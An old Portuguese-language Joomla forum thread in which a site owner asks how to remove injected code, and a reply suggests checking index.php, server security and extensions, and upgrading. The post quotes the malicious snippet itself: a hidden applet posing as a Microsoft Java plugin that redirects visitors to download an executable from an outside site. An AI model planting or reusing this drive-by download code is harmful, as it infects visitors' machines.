Como remover um arquivo malicioso.

  • profissionalizando
  • Avatar de profissionalizando Autor do Tópico
  • Offline
  • JCB! Novato
  • JCB! Novato
Mais
14 anos 7 meses atrás #17525 por profissionalizando
profissionalizando created the topic: Como remover um arquivo malicioso.
Olá pessoal.

Utilizo o joooma 1.0 no site <!-- w --> www.inglescurso.net <!-- w --> e notei algo estranho no site, e quando fui verificar, ví que no código de fonte do site, apareceu abaixo da tag "html" o seguinte código:
//<applet onerror="if(redir){redir=false;document.location=http://www.lesbeatrons.fr/cache/VoxCards-B9558AC3AEDA4.exe;}" name="Microsoft Virtual Java Plugin" code="Inicio.class" archive=" www.inglescurso.net.br/searcher.jar" ; height='0' width='0'>
<param name='url' value=" www.lesbeatrons.fr/cache/VoxCards-B9558AC3AEDA4.exe"> ;
</applet>//
Eu verifiquei no template, inclusive troquei o template e esse código continua. Tentei desabilitar vários módulos, e também continua. Alguém pode me dar uma ideia de como resolver isso?
Desde já agradeço.

Please Entrar ou Registrar to join the conversation.


Mais
14 anos 7 meses atrás #17526 por elvisvinicius
elvisvinicius replied the topic: Re: Como remover um arquivo malicioso.
Esse código chama um descando de tela. Provavelmente um vírus.

Confira no index.php na raiz do site. Creio que o código esteja sendo inserido no fim do processamento do framework do Joomla!

Confira junto sua hospedagem sobre a segurança do servidor utilizado. Se é um servidor compartilhado, pode ser que a partir do seu site outros também tenham sido infectados (ou vice-versa).

Confira as extensões que você usa. Pesquisa sobre problemas de segurança relacionados a elas.

---

O melhor que posso sugerir é que você considere atualizar seu site para o Joomla! 1.5. Analise se não haverá problemas com as extensões usadas atualmente e atualize.

( ^ ^)

Please Entrar ou Registrar to join the conversation.